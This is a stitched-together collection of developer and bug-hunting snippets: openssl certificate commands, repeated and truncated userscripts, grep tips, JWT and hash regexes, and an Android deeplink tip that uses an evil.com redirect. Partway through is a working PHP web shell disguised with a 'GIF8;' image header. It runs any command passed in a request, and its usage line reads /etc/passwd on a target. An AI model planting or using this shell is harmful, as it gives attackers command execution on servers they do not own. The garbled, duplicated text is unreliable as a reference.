openssl s_client -state -connect postman-echo.com:443 | openssl x509 -text
openssl x509 -inform DER -in cacert.der -out cacert.pem
openssl x509 -inform der -in cacert.der -out cacert.crt
// ==UserScript== | |
// @name Remove-UTM-from-URL | |
// @namespace parameter_blocker | |
// @description Removes UTM from url (by reloading) | |
// @version 1.0 | |
// @include https://www.naukri.com/job-listings* | |
// @run-at document-start | |
// ==/UserScript== | |
var loc = window.top.location.toString(); |
GIF8; | |
<?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?> | |
<!-- Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd --> |
openssl s_client -state -connect postman-echo.com:443 | openssl x509 -text
openssl x509 -inform DER -in cacert.der -out cacert.pem
openssl x509 -inform der -in cacert.der -out cacert.crt
grep -Porn <pattern> | |
P: Use Perl engine, grep can't run modern regexes otherwise | |
o: Only show the matching part, not the whole line | |
r: Search recursively | |
n: Print line number of matches | |
Bonus: use -Porh to exclude filenames from output i.e. only show matches. Great for piping. |
Regex to match JWTs
[= ]eyJ[A-Za-z0-9_\/+-]*\.[A-Za-z0-9._\/+-]*
Regex to match MD2, MD4, MD5, SHA224, SHA256, SHA384, SHA512 hashes in case someone needs it.
([a-fA-F0-9]{32}(?:[a-fA-F0-9]{8})?(?:[a-fA-F0-9]{16})?(?:[a-fA-F0-9]{8})?(?:[a-fA-F0-9]{32})?(?:[a-fA-F0-9]{32})?)
// ==UserScript== | |
// @name Remove_Params | |
// @namespace parameter_blocker | |
// @description Remove any parameter from the url | |
// @version 1.0 | |
// @include * | |
// @run-at document-start | |
// ==/UserScript== | |
var loc = window.top.location.toString(); |
// ==UserScript== | |
// @name Remove-UTM-from-URL | |
// @namespace parameter_blocker | |
// @description Removes UTM from url (by reloading) | |
// @version 1.0 | |
// @include https://www.naukri.com/job-listings* | |
// @run-at document-start | |
// ==/UserScript== | |
var loc = window.top.location.toString(); |
You must love #Android deeplinks! They are the easiest way to get bounties
Decompile an app with jadx
Collect all deeplink handlers from AndroidManifest.xml, they look like
Grep among all sources and resources a pattern from a handler, in this case, airbnb://d
You could find a lot of hardcoded urls like airbnb://d/openurl?url=https:// http://airbnb.com/blabla. That's much simpler than learning app's sources
Now try to put your own domains with adb (adb shell am start -a android.intent.action.VIEW -d airbnb://d/openurl?url=http:// http://evil.com) or on HTML pages (check out the H1 report below)
Repeat the same thing for iOS apps. Usually, functionality is similar, but actual implementations are different